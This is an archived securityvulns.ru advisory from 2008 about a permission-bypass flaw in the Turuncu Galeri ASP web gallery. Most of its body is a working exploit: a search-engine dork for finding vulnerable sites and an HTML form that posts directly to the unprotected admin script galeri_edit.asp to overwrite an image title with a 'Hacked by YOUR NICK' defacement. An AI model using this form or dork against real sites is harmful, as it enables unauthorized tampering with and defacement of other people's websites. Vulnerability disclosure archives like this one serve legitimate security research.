Computer Security

Security Advisory: Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  WellyBlog Open Source Blog Portal Cross Site Scripting Vulnerabilitiy

From:Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:29.06.2008
Subject:Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability

Title:Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability

# Discovered by : Alemin_Krali  

# Dork :resim_detay.asp?id=

# Html Form

<form action="http://www.SITE.COM/PATH/yonet/galeri_edit.asp" method="post">

<input type="hidden" name="update" value="1">
<input type="hidden" name="id" value="EDIT TO IMAGE ID">

<td width="400"><input type="text" name="baslik" style="font-size: 8pt" color="#003366" value="Hacked
by YOUR NICK" size="42" maxlength="75" /></td>

<tr><td colspan=2><center><INPUT TYPE="submit" VALUE=" Okey " </td></tr>
<tr>
<td colspan=2>&nbsp;</td>


Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru